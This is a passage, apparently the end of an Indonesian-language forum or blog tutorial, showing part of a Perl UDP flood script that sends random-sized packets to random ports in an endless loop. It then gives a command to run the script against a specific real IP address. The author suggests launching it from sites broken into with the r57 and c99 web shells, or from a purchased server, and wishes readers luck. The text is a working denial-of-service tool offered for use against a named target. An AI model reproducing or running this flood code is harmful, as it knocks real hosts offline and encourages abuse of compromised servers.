send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

langkah ke dua tinggal ketikan :

perl udp.pl ipnya 205.234.187.50 0 0

selesai dech, semua ini bisa di lakukan dalam target injekan yang di tembus pake r57 dan c99. atau bisa beli langgung ds nya di internet

selamat mencoba